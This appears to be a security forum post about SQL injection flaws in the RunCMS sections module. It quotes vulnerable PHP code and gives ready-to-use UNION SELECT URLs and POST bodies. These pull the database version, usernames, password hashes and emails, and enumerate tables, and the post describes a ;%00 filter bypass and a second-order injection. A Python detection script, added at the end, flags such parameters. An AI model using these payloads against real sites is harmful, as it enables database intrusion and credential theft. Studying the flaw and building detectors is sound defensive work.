Standard sections module (Articles)
modules/sections/index.php
PHP code:
function listarticles($secid) {
    global $rcxConfig, $rcxUser, $rcxModule, $sectionsConfig, $db, $myts, $_GET;
    $access = new groupAccess('listarticles');
    $access->loadGroups($secid, 'secid', _MI_NSECTIONS_TABLE);
    if ( !$access->checkGroups(1) ) {
        redirect_header("javascript:history.go(-1)", 3, _NOPERM);
        exit();
    }
    $result = $db->query("SELECT secname, image FROM ".$db->prefix(_MI_NSECTIONS_TABLE)." WHERE secid=$secid");
    list($secname, $image) = $db->fetch_row($result);
    $secname = $myts->makeTboxData4Show($secname);
SQL
http://localhost/runcms/modules/sections/index.php?op=listarticles&secid=1+and+1=2+union+select+version(),2
--------------------------
modules/sections/index.php
PHP code:
function viewarticle($artid, $page) {
    global $rcxUser, $rcxModule, $db, $myts, $rcxConfig, $meta, $page;
    $access = new groupAccess('viewarticle');
    $access->loadGroups($artid, 'artid', _MI_NSECCONT_TABLE);
    if ( !$access->checkGroups(1) ) {
        redirect_header("javascript:history.go(-1)", 3, _NOACTION);
        exit();
    }
    if ( !isset($page) ) {
        $db->query("UPDATE ".$db->prefix(_MI_NSECCONT_TABLE)." SET counter=counter+1 WHERE artid='$artid'");
    }
    $result = $db->query("SELECT artid, secid, title, author, date, content, allow_html, allow_smileys, allow_bbcode, counter FROM ".$db->prefix(_MI_NSECCONT_TABLE)." WHERE artid=$artid");
    list($artid, $secid, $title, $author, $date, $content, $allow_html, $allow_smileys, $allow_bbcode, $counter) = $db->fetch_row($result);
    $title = $myts->makeTboxData4Show($title);
    $myts->setType('admin');
    $content = $myts->makeTareaData4Show($content, $allow_html, $allow_smileys, $allow_bbcode);
    $thisUser = new RcxUser($author);
    if (!$thisUser->isActive()) {
        $name = _MD_UNKNOWN;
    } else {
        $name = $thisUser->uname();
    }
    $result2 = $db->query("SELECT secid, secname FROM ".$db->prefix(_MI_NSECTIONS_TABLE)." WHERE secid=$secid");
    list($secid, $secname) = $db->fetch_row($result2);
SQL
http://localhost/runcms/modules/sections/index.php?op=viewarticle&artid=1+and+1=2+union+select+1,2,version(),4,5,user(),7,8,9,10
The output of column 2 ends up in the $secid variable, so an injection for the second query can be placed there:
SQL
http://localhost/runcms/modules/sections/index.php?op=viewarticle&artid=1+and+1=2+union+select+1,"1+and+1=2+union+select+1,version()",3,4,5,6,7,8,9,10
--------------------------
Convenient multi-line output
/modules/sections/index.php
PHP code:
$result = $db->query("SELECT COUNT(*) FROM ".$db->prefix(_MI_NSECCONT_TABLE));
list($numrows) = $db->fetch_row($result);
if ($numrows > 0) {
    $_GET['show'] ? $show = $_GET['show'] : $show = 0;
    $limit = $sectionsConfig['article_limit'];
    $result = $db->query("SELECT artid, title, byline, author, content, counter, date FROM ".$db->prefix(_MI_NSECCONT_TABLE)." WHERE secid=$secid", $limit, $show);
    while (list($artid, $title, $byline, $author, $content, $counter, $date) = $db->fetch_row($result)) {
        $title = $myts->makeTboxData4Show($title);
        $byline = $myts->makeTboxData4Show($byline);
        $content = $myts->makeTareaData4Show($content);
        $thisUser = new RcxUser($author);
SQL
http://localhost/runcms/modules/sections/index.php?op=listarticles&secid=1+union+select+1,uname,pass,4,5,email,7+from+w1kj7jl__users
The number of rows output is taken from the configuration (10 by default); the results can be viewed in chunks by adjusting the show parameter:
/index.php?op=listarticles&secid={SQL}&show=10
The $_GET array is filtered for the terminators -- and /*, but ;%00 works if mq (magic_quotes) is off.
http://localhost/runcms/modules/sections/index.php?op=listarticles&secid=1+union+select+1,table_schema,table_name,4,5,6,7+from+INFORMATION_SCHEMA.tables;%00
$secid is also accepted via $_POST, which is probably the most convenient option.
http://localhost/runcms/modules/sections/index.php?op=listarticles
POST body:
secid=1+union+select+1,table_schema,table_name,4,5,6,7+from+INFORMATION_SCHEMA.tables+limit+0,300--
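As an added example (not code from this post or from RunCMS), the Python below models the $_GET terminator filter described above next to a strict integer allow-list, and flags secid/artid values in request query strings or POST bodies the way a log review would; the filter approximation and the request samples are constructed, and the $secid from the first query being reused unquoted in the second is why the allow-list belongs at the parameter, not at the comment terminators.

```python
import re
from urllib.parse import unquote_plus

# Constructed approximation of the filter the post describes: it removes
# the comment terminators "--" and "/*" and nothing else, so a NUL byte
# (";%00") used in their place passes through untouched.
def runcms_terminator_filter(value):
    return value.replace("--", "").replace("/*", "")

def strict_int_param(value):
    """Allow-list check: secid/artid must be a plain decimal integer."""
    return int(value) if re.fullmatch(r"[0-9]{1,10}", value) else None

# Markers covering the variants shown in the post: UNION SELECT,
# information_schema lookups, version()/user() probes, NUL terminator.
SUSPICIOUS = re.compile(
    r"union\s+select|information_schema|version\(\)|user\(\)|\x00",
    re.IGNORECASE,
)

def parse_query(query_string):
    """Decode a query string or urlencoded POST body into (name, value)
    pairs. Done by hand so a ';' inside a value is kept as data."""
    pairs = []
    for part in query_string.split("&"):
        if not part:
            continue
        name, _, raw = part.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(raw)))
    return pairs

def flag_params(query_string):
    """Names of secid/artid params whose value is not a plain integer or
    matches an injection marker; either condition alone is enough."""
    flagged = []
    for name, value in parse_query(query_string):
        if name in ("secid", "artid") and (
            strict_int_param(value) is None or SUSPICIOUS.search(value)
        ):
            flagged.append(name)
    return flagged

# Constructed sample requests (the last two reuse payload shapes from the post).
CONSTRUCTED_REQUESTS = [
    "op=listarticles&secid=1",
    "op=listarticles&secid=5&show=10",
    "op=viewarticle&artid=1+and+1=2+union+select+1,2,version(),4,5,user(),7,8,9,10",
    "op=listarticles&secid=1+union+select+1,table_schema,table_name,4,5,6,7"
    "+from+INFORMATION_SCHEMA.tables;%00",
]

if __name__ == "__main__":
    for req in CONSTRUCTED_REQUESTS:
        print(req[:50], "->", flag_params(req) or "clean")
    print(repr(runcms_terminator_filter("1 union select 1,2;\x00")))
```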